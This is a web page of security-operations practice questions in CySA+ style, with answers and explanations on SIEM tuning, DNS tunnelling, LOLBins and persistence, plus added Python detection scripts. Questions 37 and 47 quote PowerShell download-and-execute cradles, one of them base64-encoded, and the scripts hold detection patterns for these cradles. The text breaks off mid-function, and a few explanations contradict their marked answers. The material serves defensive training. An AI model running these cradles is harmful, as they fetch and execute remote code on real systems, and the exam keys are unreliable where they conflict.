CCNA Cysa Security Operations Questions

75 of 165 questions · Page 1/3 · Cysa Security Operations topic · Answers revealed

1
MCQ · easy

During a network traffic review, an analyst notices encrypted traffic to an unusual external IP address on TCP port 53. What is the most likely anomaly this indicates?

A. Normal DNS resolution
B. Beaconing to command and control
C. Data exfiltration via DNS tunnelling
D. HTTP smuggling attack
Answer: C

Encrypted traffic on TCP/53 is a classic sign of DNS tunnelling for data exfiltration.

Why this answer

Port 53 is used for DNS, which typically uses UDP. Encrypted traffic on TCP/53 suggests DNS tunnelling, where data is exfiltrated inside DNS queries and responses.

2
MCQ · medium

An analyst is triaging a SIEM alert that fires when a single host makes more than 100 outbound connections to unique IPs within one minute. The analyst finds that the host is a web server responding to legitimate client requests. What is the best action to reduce false positives?

A. Increase the threshold to 500 connections per minute
B. Change the rule to alert on inbound connections
C. Disable the alert rule
D. Create an exception for the web server's IP
Answer: A

A higher threshold accommodates legitimate traffic.

Why this answer

Adjusting the threshold to a higher number that accounts for normal web server traffic will reduce false positives while still detecting scanning behavior.

3
MCQ · medium

A security analyst is configuring a SIEM correlation rule to detect potential brute-force attacks. Which log source combination is most appropriate for this rule?

A. Authentication logs and firewall logs
B. Authentication logs and DNS logs
C. Firewall logs and IDS logs
D. Endpoint logs and cloud audit logs
Answer: A

Authentication logs provide the login events, and firewall logs provide the source IPs to correlate and identify brute-force sources.

Why this answer

Authentication logs show login attempts, and firewall logs show source IPs; combining them can detect multiple failed logins from an IP.

4
MCQ · easy

An organization wants to detect threats in their AWS environment using a cloud-native service that monitors for suspicious API calls and potential credential compromise. Which service should they use?

A. AWS Config
B. AWS GuardDuty
C. AWS CloudTrail
D. AWS Inspector
Answer: B

Correct. GuardDuty is a threat detection service.

Why this answer

AWS GuardDuty is a threat detection service that monitors for malicious activity, including suspicious API calls and credential compromise.

5
MCQ · hard

A threat hunter notices that a legitimate Windows binary 'rundll32.exe' is executing with network connections to an external IP address. The parent process is 'winword.exe'. Which LOLBin technique is most likely being used?

A. Scheduled task creation
B. Process hollowing
C. DLL side-loading via rundll32
D. WMI persistence
Answer: C

Correct. Rundll32 is used to load DLLs, and winword.exe as parent suggests malicious macro.

Why this answer

Rundll32.exe is a known LOLBin that can be used to execute DLLs. When spawned from winword.exe, it often indicates a macro-based attack loading a remote payload.

6
MCQ · easy

An analyst is using AWS GuardDuty and sees a finding that an EC2 instance is communicating with a known command-and-control (C2) IP address. What type of alert is this?

A. CASB alert investigation
B. Vulnerability scan result
C. Cloud audit log analysis
D. Threat intelligence finding
Answer: D

GuardDuty uses threat intelligence to identify C2 communication.

Why this answer

GuardDuty detects threats based on known malicious IPs, so communication with a C2 IP is a security finding indicating a potential compromise.

7
Multi-Select · medium

A security analyst is investigating an alert from Azure Sentinel that indicates a user account has logged in from a geographically improbable location. The analyst needs to determine if this is a true positive. Which TWO additional data sources should the analyst examine? (Choose TWO.)

Select 2 answers
A. Cloud audit logs for the user's recent activity
B. VPN logs to see if the user connected via a VPN
C. Authentication logs to verify the source IP and timestamp
D. Threat intelligence feeds for the source IP reputation
E. Device compliance status of the user's endpoint
Answers: C, D

Correct. They provide details of the login event.

Why this answer

Authentication logs show the source IP and timestamp, and threat intelligence can reveal if the IP is known malicious. Device compliance may be irrelevant, and VPN logs could explain the location.

8
Multi-Select · medium

A security analyst is tuning a SIEM rule that generates alerts for every failed login attempt. The rule is causing alert fatigue. Which TWO actions would reduce false positives while maintaining security visibility?

Select 2 answers
A. Aggregate alerts by source IP and time window
B. Disable the rule entirely
C. Whitelist IP addresses of internal services that generate repeated failed logins
D. Increase the alert severity threshold
E. Increase the log retention period
Answers: A, C

This groups multiple attempts into one alert, reducing noise.

Why this answer

Aggregating alerts by source IP reduces noise from individual attempts. Whitelisting known service accounts performing repeated failed logins (due to misconfigured services) also reduces false positives.

9
MCQ · hard

A SOC analyst is investigating an alert from AWS GuardDuty that indicates 'UnauthorizedAccess:EC2/SSHBruteForce'. The analyst reviews CloudTrail logs and sees multiple failed SSH login attempts from a single IP address. What initial triage action should the analyst take?

A. Enable multi-factor authentication for all users
B. Block the source IP address in the security group
C. Remove the instance from the auto-scaling group
D. Disable the SSH service on the instance
Answer: B

Blocking the source IP stops the attack without disrupting legitimate traffic.

Why this answer

The best initial action is to block the source IP address at the security group or network ACL to stop the brute force attack, then investigate further.

10
MCQ · easy

Which of the following is a primary benefit of using credentialed vulnerability scans over non-credentialed scans?

A. They are less likely to crash services
B. They provide more accurate results by checking internal configurations
C. They are faster and less intrusive
D. They do not require network access
Answer: B

Credentialed scans can verify patch levels and settings.

Why this answer

Credentialed scans can access the OS and applications, allowing deeper inspection of installed software, patches, and configuration settings.

11
MCQ · easy

A security analyst is reviewing SIEM alerts and notices a high volume of alerts for a specific event ID that has been determined to be benign. Which action should the analyst take to reduce noise?

A. Increase the severity of the alert
B. Reclassify the alert as a true positive
C. Create a suppression rule for that event ID
D. Disable the SIEM correlation engine
Answer: C

Suppressing known false positives reduces noise.

Why this answer

True positive alerts are genuine threats; false positives are benign. Tuning the SIEM to suppress known false positives reduces alert fatigue.

12
MCQ · medium

During a network traffic analysis, a security analyst observes repeated connections from an internal host to a known malicious IP on port 4444. The payload appears to be encrypted. Which type of activity is most likely indicated?

A. Port scanning activity
B. Command and control beaconing
C. Data exfiltration via DNS tunnelling
D. Lateral movement using SMB
Answer: B

Correct. This matches C2 behavior.

Why this answer

Repeated connections to a known malicious IP on a non-standard port with encrypted payloads strongly suggest command and control (C2) beaconing.

13
MCQ · hard

An analyst is investigating a host that communicates with a domain using a DGA-like algorithm. The domain name appears random and resolves to different IPs over time. Which threat-hunting technique would best identify the DGA pattern?

A. Sigma rule on process creation events
B. NetFlow analysis for data volume
C. YARA rule matching on process memory
D. DNS log analysis for entropy and frequency
Answer: D

Correct. DNS log analysis can reveal DGA patterns via high-entropy domains.

Why this answer

DGA domains can be detected by analyzing DNS query patterns for algorithmic generation, often using frequency analysis or ML models.

14
MCQ · hard

During a threat hunting exercise, an analyst uses osquery to query process events on endpoints. They discover a process named 'svchost.exe' running under a user account with parent process 'cmd.exe'. Which of the following describes this observation?

A. Normal behavior for Windows services
B. Evidence of a DLL injection attack
C. Potential LOLBin abuse with anomalous parent-child relationship
D. Indicative of a process hollowing attack
Answer: C

Attackers often use svchost.exe as a LOLBin, and the unusual parent cmd.exe suggests malicious activity.

Why this answer

svchost.exe should normally run under SYSTEM or NETWORK SERVICE with 'services.exe' as parent. A user-level svchost.exe with cmd.exe parent indicates a potential LOLBin misuse.

15
Multi-Select · medium

A security analyst is creating a YARA rule to detect a specific malware strain that uses a unique string in its code section and has a characteristic import table. The analyst wants to minimize false positives. Which THREE YARA rule elements should the analyst include?

Select 3 answers
A. File size condition
B. PE import table condition
C. Hash condition
D. String condition containing the unique string
E. Module condition (e.g., pe)
Answers: A, B, D

Limiting file size helps avoid matching unrelated files of different sizes.

Why this answer

Including file size limits, a specific string, and the import table condition reduces false positives by narrowing the scope.

16
Multi-Select · medium

A security analyst is hunting for signs of lateral movement in the network. Which THREE indicators are most consistent with lateral movement techniques?

Select 3 answers
A. Unusual outbound DNS queries to known malicious domains
B. An RDP connection from a domain controller to a workstation
C. Creation of a new service on a remote system using sc.exe
D. Multiple failed logins from a single workstation to many servers
E. Execution of PsExec from a non-administrative workstation
Answers: B, C, E

RDP from a domain controller to a workstation is unusual and may indicate lateral movement.

Why this answer

Lateral movement often involves remote execution tools (PsExec), remote service creation, and suspicious RDP connections.

17
Multi-Select · medium

A SOC analyst is triaging a SIEM alert that indicates a possible DNS tunneling attack. The alert was generated based on a correlation rule that looks for unusually high DNS query volume from a single host. Which TWO additional data sources should the analyst correlate to confirm the attack?

Select 2 answers
A. Firewall logs
B. Endpoint registry logs
C. DNS server logs
D. Authentication logs
E. NetFlow/IPFIX
Answers: C, E

DNS logs contain queried domain names and response sizes, useful for detecting tunneling.

Why this answer

DNS logs can show query patterns and payload sizes. NetFlow can show data transfer volumes. Both help confirm tunneling.

18
MCQ · medium

A threat intelligence report indicates that a known APT group is using 'regsvr32.exe' to execute malicious code. Which detection rule type would be most effective in identifying this technique across multiple endpoints?

A. Snort rule
B. YARA rule
C. Suricata rule
D. Sigma rule
Answer: D

Sigma rules provide a generic signature format for log events, ideal for detecting regsvr32 usage in process creation logs.

Why this answer

Sigma rules are designed for log detection across SIEMs, making them suitable for detecting specific command-line patterns like regsvr32 execution.

19
MCQ · medium

A security analyst is reviewing an alert from a CASB that shows a user downloading a large volume of sensitive data from a cloud storage application to a personal device outside of business hours. The user's behavior is atypical. Which of the following is the most likely interpretation?

A. Indicates a compromised account being used for data exfiltration
B. True positive - but only if the user has been phished
C. False positive - the user is working overtime
D. Indicates a misconfigured CASB policy
Answer: A

Correct. Unusual download volume and time suggest an attacker exfiltrating data.

Why this answer

Atypical data download from a cloud service to a personal device outside business hours is a strong indicator of data exfiltration.

20
Multi-Select · hard

An analyst is reviewing a CASB alert indicating that a user accessed a cloud application from a geolocation that is not typical for the organization. Which THREE additional data sources would be most helpful to determine if the activity is malicious?

Select 3 answers
A. User activity logs from the cloud application
B. Threat intelligence feeds for the source IP address
C. Firewall logs showing outbound connections
D. Vulnerability scan results for the user's workstation
E. Authentication logs from the identity provider
Answers: A, B, E

They show what actions the user performed, helping to identify anomalous behavior.

Why this answer

Authentication logs show if the login was successful and from which IP; threat intel can identify if the IP is malicious; user activity logs show behavior patterns.

21
Multi-Select · medium

A security analyst is reviewing a CASB alert indicating a user is accessing a cloud storage application from an unusual location. The analyst needs to investigate further. Which TWO actions are most appropriate?

Select 2 answers
A. Review the cloud application's audit logs for file access or sharing events
B. Disable the user's account immediately
C. Reset the user's password without further analysis
D. Check the user's recent authentication logs for successful logins
E. Block all access to the cloud application from that location
Answers: A, D

Audit logs show what actions were taken, helping determine if data was exfiltrated.

Why this answer

Checking the user's recent authentication logs can confirm if the access was legitimate. Reviewing the cloud application's audit logs can provide details on the activities performed. The other options are less relevant or too broad.

22
MCQ · medium

During a threat hunting exercise, an analyst creates a hypothesis that a threat actor may be using scheduled tasks for persistence. Which Windows registry key or log source should the analyst examine to confirm the hypothesis?

A. Check the Run registry keys (HKLM\Software\Microsoft\Windows\CurrentVersion\Run)
B. Review the Windows Security Event Log for event ID 4698 (scheduled task creation)
C. Examine the System event log for driver loading events
D. Analyze the application event log for error messages
Answer: B

Event ID 4698 logs when a scheduled task is created, providing evidence of persistence.

Why this answer

Scheduled tasks are managed by the Windows Task Scheduler and can be listed with schtasks.exe (or through the Task Scheduler API). They are not primarily stored in the registry but in %SystemRoot%\Tasks, although the registry does hold other persistence mechanisms such as the Run keys. Examining 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule' is not a standard check, and the Task Scheduler logs or the tasks folder would otherwise be the natural place to look.

Because the question limits the choice to a registry key or a log source, the best answer is to review the Windows Security Event Log for event ID 4698 (scheduled task creation).

23
MCQ · easy

A security analyst notices a high number of alerts from a new detection rule that triggers on 'any outbound connection to a known malicious IP'. After investigation, the analyst finds that the IP address is from a threat intelligence feed but the connections are actually from a legitimate security scanner that was recently deployed. How should the analyst handle this?

A. Add the scanner's IP to an allowlist in the rule
B. Disable the rule permanently
C. Report the scanner as compromised
D. Increase the severity of the rule
Answer: A

Allowlisting legitimate sources reduces false positives while maintaining detection.

Why this answer

The alerts are false positives because the traffic is legitimate. The analyst should tune the rule to exclude the scanner's source IP addresses.

24
MCQ · hard

A threat hunter is analyzing EDR telemetry and discovers that the process svchost.exe spawned a child process powershell.exe. The powershell.exe then established a network connection to an external IP address. Which of the following best describes this behavior in the context of threat hunting?

A. A Windows update process
B. Normal administrative activity
C. A false positive from EDR
D. Living off the land binary (LOLBin) usage
Answer: D

Attackers use LOLBins like PowerShell to blend in; svchost as parent is unusual and indicates potential abuse.

Why this answer

Svchost.exe is a legitimate Windows process, but it should not spawn PowerShell. This is an unusual parent-child relationship often indicative of lateral movement or code injection, where attackers use svchost to execute malicious code.

25
MCQ · medium

A security engineer is configuring a new SIEM correlation rule to detect lateral movement. Which of the following log sources would provide the most relevant data for detecting pass-the-hash attacks?

A. Authentication logs
B. Cloud audit logs
C. DNS logs
D. Firewall logs
Answer: A

Authentication logs record logon attempts and can reveal pass-the-hash indicators.

Why this answer

Authentication logs (e.g., Windows Security Event ID 4624) contain details about logon types (e.g., Network logon) and account names, which are crucial for detecting pass-the-hash.

26
MCQ · medium

A security analyst is configuring a vulnerability scanner for internal infrastructure. Management wants to minimize disruption to critical systems while ensuring accurate results. Which scan configuration should the analyst recommend?

A. Non-credentialed scans during business hours
B. External scans only
C. Credentialed agent-based scans during off-peak hours
D. Continuous non-credentialed scans
Answer: C

Agent-based scans reduce network load and off-peak hours minimize disruption.

Why this answer

Credentialed scans provide more accurate results by accessing the system deeply, but they can cause load. Agent-based scans reduce network load and allow scheduling, minimizing disruption.

27
MCQ · medium

An analyst is tasked with creating a correlation rule in the SIEM to detect beaconing activity. Which log sources and fields are most relevant to model this behavior?

A. Authentication logs and user IDs
B. Firewall logs and connection timestamps
C. Endpoint logs and process creation
D. DNS logs and query types
Answer: B

Correct. Beaconing is detected by analyzing connection frequency and regularity in firewall logs.

Why this answer

Beaconing involves periodic outbound connections, so firewall logs (source IP, destination IP, destination port) and connection timestamps are essential for detecting regularity.

28
MCQ · easy

An analyst needs to capture network traffic on a Linux server to investigate a potential data exfiltration. Which command-line tool is best suited for real-time packet capture and analysis?

A. tcpdump
B. netstat
C. iperf
D. nmap
Answer: A

tcpdump is the standard CLI tool for packet capture on Linux.

Why this answer

tcpdump is a powerful command-line packet analyzer for Linux, capable of capturing network traffic in real time and saving it for later analysis.

29
MCQ · medium

A security analyst is investigating a series of alerts from AWS GuardDuty indicating 'UnauthorizedAccess:EC2/SSHBruteForce'. The affected EC2 instance has a high CPU load. The analyst checks the security group rules and finds that SSH (port 22) is open to 0.0.0.0/0. What is the best immediate remediation action?

A. Create a new security group allowing SSH only from known IPs and attach it to the instance
B. Terminate the EC2 instance immediately
C. Disable the GuardDuty alert to reduce noise
D. Install a host-based firewall on the instance to block SSH
Answer: A

This reduces exposure while maintaining necessary access.

Why this answer

The instance is exposed to the internet on SSH. Restricting SSH access to known IP addresses reduces the attack surface. Creating a new security group with a narrow source range and applying it stops brute force attempts.

30
MCQ · medium

During a threat hunt, an analyst notices repeated DNS queries for random-looking subdomains under a legitimate domain. The domains have high entropy and never existed before. What technique is most likely being used?

A. Fast flux
B. DNS cache poisoning
C. DNS tunneling
D. Domain Generation Algorithm (DGA)
Answer: D

Random high-entropy subdomains are characteristic of DGA.

Why this answer

Domain Generation Algorithms (DGAs) generate many random domain names to evade blocklists. C2 malware often uses DGAs.

31
MCQ · easy

A vulnerability scan report shows a critical vulnerability with a CVSS score of 9.8 on a web server. However, the server is only accessible from internal IP addresses and is protected by a Web Application Firewall (WAF) that blocks the attack vector. Which of the following should the analyst recommend?

A. Accept the risk due to compensating controls.
B. Disable the WAF to test the vulnerability.
C. Immediately patch the server during business hours.
D. Run an uncredentialed scan to confirm the vulnerability.
Answer: A

The WAF mitigates the vulnerability, so risk acceptance is appropriate with documentation.

Why this answer

Compensating controls like a WAF that effectively blocks the attack reduce the risk. While patching is ideal, the vulnerability may not be immediately exploitable due to the WAF.

32
Multi-Select · hard

A threat hunter is using Velociraptor to search for signs of lateral movement across multiple endpoints. The hunter wants to identify instances where a user logged into multiple systems using the same credentials within a short time frame. Which THREE artifacts should the hunter collect from each endpoint?

Select 3 answers
A. Network connections (netstat)
B. Windows Event Logs for WMI activity
C. File system for malicious executables
D. Registry hives for persistence
E. Security Event Logs (logon events)
Answers: A, B, E

Active network connections can indicate remote access tools.

Why this answer

Security Event Logs (Event ID 4624) show logon sessions, network connections show remote access, and WMI Activity logs can indicate lateral movement via WMI.

33
Multi-Select · hard

A threat hunter is analyzing network traffic and observes a system making outbound connections to multiple IP addresses on port 53 (DNS) with unusually large payload sizes. The hunter suspects DNS tunneling. Which THREE characteristics are indicative of DNS tunneling?

Select 3 answers
A. Large DNS payload sizes
B. DNS responses with NXDOMAIN for most queries
C. Non-standard record types such as TXT or NULL
D. High frequency of DNS queries to a single domain
E. Use of standard A record queries
Answers: A, C, D

Typical DNS queries are small; large payloads suggest data encoding.

Why this answer

DNS tunneling often involves large payloads, high query volume to a single domain, and non-standard record types to encode data.

34
MCQ · medium

A security analyst is investigating a potential DNS tunneling attack. Which of the following patterns in DNS logs would most likely indicate such activity?

A. A high number of NXDOMAIN responses
B. Unusually long subdomain names with high query frequency to a single domain
C. Consistent query intervals to a known legitimate domain
D. Queries to domains that are less than 24 hours old
Answer: B

Long subdomains with high frequency are classic tunneling indicators.

Why this answer

DNS tunneling encodes data in subdomains, resulting in long, random-looking domain names with high query volumes to a specific domain.

35
MCQ · medium

A vulnerability scan report shows a critical vulnerability on a web server. The server is behind a WAF that blocks the relevant exploit payloads. According to the organization's risk management policy, what should the analyst do?

A. Accept the risk and document the compensating control
B. Remove the WAF to allow the vulnerability to be exploited
C. Immediately patch the server
D. Mark the vulnerability as a false positive
Answer: A

When a compensating control is effective, risk acceptance is appropriate.

Why this answer

Compensating controls like a WAF can justify accepting the risk rather than immediately patching if it would cause downtime.

36
MCQ · medium

A security team is reviewing cloud audit logs from AWS CloudTrail and notices repeated API calls to create EC2 instances in a region where the organization has no presence. What is the most likely cause?

A. Compromised AWS credentials
B. Configuration drift
C. Service outage
D. Valid administrative activity
Answer: A

Attackers often use compromised keys to spin up resources for cryptomining.

Why this answer

Unauthorized API calls to create resources in unusual regions often indicate compromised credentials or an attacker using the account for cryptomining.

37
MCQ · hard

An analyst is investigating an EDR alert showing that 'powershell.exe' was launched by 'winword.exe' with the command: 'powershell -Command Invoke-WebRequest -Uri http://malicious.com/payload.ps1 -OutFile C:\Users\Public\payload.ps1'. Which LOLBin technique is being observed?

A. PowerShell download cradle
B. WMI persistence
C. Scheduled task creation
D. DLL side-loading
Answer: A

PowerShell is used to download and save a payload, a common LOLBin technique.

Why this answer

The attack chain involves a Microsoft Office document (winword.exe) launching PowerShell to download a payload. This is a classic LOLBin technique using PowerShell for code execution and download cradles.

38
MCQ · easy

A security analyst is reviewing a NetFlow record that shows a large amount of data being transferred from an internal server to an external IP address on port 443 during non-business hours. Which type of activity should the analyst suspect?

A. Denial-of-service attack
B. Port scanning
C. Normal backup operation
D. Data exfiltration
Answer: D

Unusual outbound data transfer on an encrypted channel is a classic exfiltration indicator.

Why this answer

Large data transfers to an external IP on an encrypted channel (HTTPS) during off-hours is a common indicator of data exfiltration.

39
MCQ · easy

Which of the following is a persistence mechanism that involves modifying the Windows Registry to execute a program when a user logs in?

A. Scheduled Task
B. Run key
C. Service
D. Startup folder
Answer: B

Run keys in the Registry execute programs at logon.

Why this answer

The 'Run' registry key is commonly used to launch programs automatically at user logon, making it a persistence mechanism.

40
MCQ · medium

A SOC analyst receives an alert from the SIEM indicating a high volume of outbound traffic from a single workstation to an IP address in a country where the organization does no business. The alert is based on a rule that triggers when outbound traffic exceeds 1 GB in 5 minutes. Upon investigation, the analyst finds that the workstation is used by a developer who downloaded a large dataset from a cloud storage service. Which action should the analyst take to improve the alert's accuracy without disabling it entirely?

A. Increase the alert threshold to 10 GB in 5 minutes.
B. Create a correlation rule that combines this alert with other indicators.
C. Disable the alert rule permanently.
D. Add the destination IP to a whitelist in the SIEM rule.
Answer: D

Whitelisting legitimate IPs reduces false positives while maintaining detection for other IPs.

Why this answer

The alert is a false positive because legitimate activity triggered it. The best approach is to tune the rule to exclude known cloud storage IP addresses or increase the threshold to reduce noise while still detecting true exfiltration.

41
MCQ · medium

A security analyst is tuning a SIEM rule that triggers on any process creation event involving 'rundll32.exe'. The rule generates many false positives from legitimate software updates. Which tuning action would most effectively reduce false positives while maintaining detection of malicious use?

A. Add an exclusion list for known good command-line arguments or parent processes
B. Change the rule to trigger only on network connections from rundll32.exe
C. Disable the rule entirely
D. Increase the severity threshold of the rule
Answer: A

Excluding known legitimate activity reduces false positives while keeping the rule active.

Why this answer

Creating an exception list for known legitimate processes or command lines that use rundll32.exe reduces false positives. However, the best approach is to modify the rule to include specific conditions such as parent process or command-line arguments that indicate malicious activity.

42
MCQ · easy

A security analyst is investigating an alert from AWS GuardDuty that indicates an EC2 instance is communicating with a known malicious IP address on port 4444. The analyst checks the VPC Flow Logs and confirms the traffic. Which of the following is the most appropriate immediate action?

A. Create a new IAM role for the instance
B. Apply a restrictive security group to isolate the instance
C. Terminate the EC2 instance immediately
D. Update the route table to blackhole the traffic
Answer: B

Correct. Isolation stops traffic while preserving the instance for investigation.

Why this answer

Isolating the EC2 instance by applying a restrictive security group stops the malicious communication and allows further investigation.

43
MCQ · medium

An analyst is reviewing network traffic logs and notices a series of connections from an internal workstation to an external IP address on TCP port 53. The traffic consists of large DNS queries with random-looking subdomains. Which technique is most likely being used?

A. Domain generation algorithm (DGA)
B. DNS tunneling
C. Beaconing
D. HTTP smuggling
Answer: B

Correct. Large DNS queries with random subdomains to a fixed IP are indicative of DNS tunneling.

Why this answer

DNS tunneling uses the DNS protocol to exfiltrate data by encoding it in DNS queries, often with random-looking subdomains.

44
Multi-Select · hard

During a threat hunt, an analyst uses Velociraptor to collect forensic artifacts from endpoints. Which THREE of the following artifacts are most useful for detecting persistence mechanisms?

Select 3 answers
A. List of installed updates
B. Scheduled tasks
C. ARP cache
D. Service configuration
E. Registry Run keys
Answers: B, D, E

Attackers often create scheduled tasks for persistence.

Why this answer

Scheduled tasks, registry Run keys, and service configurations are common persistence locations used by attackers, so they are the artifacts to collect and review.

45
MCQ · hard

During a cloud security investigation, an analyst notices that an AWS IAM user generated multiple 'CreateKeyPair' API calls from an IP address outside the corporate network. Which AWS service is best suited to detect this type of anomalous behavior?

A. AWS CloudTrail
B. AWS Config
C. AWS GuardDuty
D. AWS Inspector
Answer: C

GuardDuty is designed to detect suspicious API activity.

Why this answer

AWS GuardDuty uses machine learning and threat intelligence to detect anomalous API activity, including unauthorized key creation, via CloudTrail logs.

46
Multi-Select · medium

A threat hunter is reviewing endpoint telemetry and sees a process 'svchost.exe' spawning 'cmd.exe', which then executes 'reg.exe add' to create a Run key. The hunter suspects persistence. Which TWO artifacts should the hunter examine to confirm persistence?

Select 2 answers
A. Registry Run keys
B. Windows Event Logs for service creation
C. Browser history
D. Scheduled tasks
E. Network connections
Answers: A, D

The command explicitly adds a Run key, so checking the registry is necessary.

Why this answer

The reg.exe command writes a value under ...\CurrentVersion\Run, so the first check is the registry itself: does the value exist, what binary does it point to, and does Sysmon Event ID 13 (registry value set) or Security Event ID 4657 show which process wrote it. Scheduled tasks are the other persistence mechanism routinely created from the command line (schtasks /create), so the task definitions should be reviewed for anything pointing at the same binary. Browser history and current network connections would not confirm that something survives a reboot.
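The following is an added example (not code from the page) covering both this question and question 44 above: a small hunt over constructed Sysmon-style events that flags the command-line persistence mechanisms (reg.exe add to a Run key, schtasks /create, sc create) and then corroborates a Run-key command against the registry value-set event that shows the write actually landed. The event contents, paths, SID and value names are assumptions; the Sysmon event IDs (1 = process create, 13 = registry value set) and the ATT&CK IDs are the real ones.

```python
import re

# Constructed Sysmon-style events (not from the page). EventID 1 = process create,
# EventID 13 = registry value set. The SID and paths are placeholders for the sample.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r'cmd.exe /c reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "C:\Users\Public\upd.exe"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "C:\Users\Public\upd.exe"'},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Users\Public\upd.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'schtasks.exe /create /tn Updater /tr C:\Users\Public\upd.exe /sc onlogon'},
    {"EventID": 1, "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"reg.exe query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"},
]

# (ATT&CK id, name, binary, command-line pattern) for command-line persistence creation.
RULES = [
    ("T1547.001", "Registry Run Keys", "reg.exe", re.compile(r"\badd\b.*\\CurrentVersion\\Run", re.I)),
    ("T1053.005", "Scheduled Task", "schtasks.exe", re.compile(r"/create\b", re.I)),
    ("T1543.003", "Windows Service", "sc.exe", re.compile(r"\bcreate\b", re.I)),
]
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\(Run|RunOnce)\\", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def hunt_persistence(events):
    """Return process-based and registry-based persistence findings in event order."""
    findings = []
    for ev in events:
        if ev["EventID"] == 1:
            image = basename(ev["Image"])
            for tid, name, binary, pattern in RULES:
                if image == binary and pattern.search(ev["CommandLine"]):
                    findings.append({"source": "process", "technique": tid, "name": name,
                                     "parent_chain": f"{basename(ev['ParentImage'])} -> {image}",
                                     "command_line": ev["CommandLine"]})
        elif ev["EventID"] == 13 and RUN_KEY_RE.search(ev["TargetObject"]):
            findings.append({"source": "registry", "technique": "T1547.001", "name": "Registry Run Keys",
                             "key": ev["TargetObject"], "value": ev["Details"],
                             "writer": basename(ev["Image"])})
    return findings


def corroborated_run_keys(findings):
    """Binaries that appear both as the /d argument of a reg.exe add and as a value actually written."""
    written = {f["value"] for f in findings if f["source"] == "registry"}
    confirmed = []
    for f in findings:
        if f["source"] == "process" and f["technique"] == "T1547.001":
            m = re.search(r'/d\s+"?([^"\s]+)"?', f["command_line"])
            if m and m.group(1) in written:
                confirmed.append(m.group(1))
    return confirmed


if __name__ == "__main__":
    found = hunt_persistence(SAMPLE_EVENTS)
    for f in found:
        print(f)
    print("confirmed Run-key payloads:", corroborated_run_keys(found))
```

The cmd.exe event carries the same reg.exe string but is not reported twice because the rule keys on the executing image; the reg.exe query and the genuine svchost.exe launch produce nothing. The same three checks map directly onto the artifacts a collection tool such as Velociraptor gathers from a fleet (scheduled tasks, services, Run keys), which is the point of question 44.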

47
MCQhard

An EDR agent reports that the process 'svchost.exe' spawned 'powershell.exe' with the command line: 'powershell -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4AMQAwAC8AcABhAHkAbABvAGEAZAAuAGUAeABlACcAKQA='. Which of the following is the most appropriate classification for this activity?

A.True positive - but only if the IP is confirmed malicious
B.False positive - encoded commands are used by system administrators
C.False positive - svchost.exe commonly launches PowerShell for legitimate tasks
D.True positive - likely malicious activity using a LOLBin
AnswerD

Correct. PowerShell is a LOLBin, the encoded command is a download-and-execute cradle, and svchost.exe is an unusual parent for a user-launched PowerShell.

Why this answer

The encoded command decodes (base64, then UTF-16LE) to 'IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.10/payload.exe')', a download cradle that fetches and executes code in memory. That alone makes the alert a true positive; the internal address does not make it benign, since attackers stage payloads on hosts they already control. One caveat about the parent: svchost.exe hosts the Task Scheduler service, so it is a legitimate parent for commands launched by scheduled tasks. That does not excuse the cradle, but it tells the analyst where to look next: the task that launched it.
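Decoding is the step analysts most often skip when an encoded alert fires. As an added example (not code from the page), this Python script extracts the payload from any of the -EncodedCommand spellings powershell.exe accepts (-e, -ec, -enc and longer prefixes), decodes it as UTF-16LE, and classifies the result by the download and in-memory-execution markers it contains. The encoded string is the one from the alert above; the indicator list and the verdict wording are this example's own.

```python
import base64
import re

# The command line from the alert in question 47 above (the base64 is taken from the page).
ALERT_CMDLINE = (
    "powershell -EncodedCommand "
    "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4A"
    "RABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgA"
    "LgAxAC4AMQAwAC8AcABhAHkAbABvAGEAZAAuAGUAeABlACcAKQA="
)

# Markers of a download cradle. "in-memory execution" plus "download" together is the
# classic fetch-and-run pattern; each alone is weaker evidence.
CRADLE_PATTERNS = {
    "download": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|"
                           r"Invoke-RestMethod|Start-BitsTransfer|WebClient", re.I),
    "in-memory execution": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "url": re.compile(r"https?://[^\s'\"()]+", re.I),
}


def extract_encoded_payload(cmdline):
    """Return the base64 token following an EncodedCommand flag, or None.
    powershell.exe resolves unambiguous prefixes, so -e, -ec, -enc, -encoded all work."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if not tok.startswith("-"):
            continue
        flag = tok[1:].lower()
        if flag in ("e", "ec") or (len(flag) >= 3 and "encodedcommand".startswith(flag)):
            return tokens[i + 1]
    return None


def decode_encoded_command(b64):
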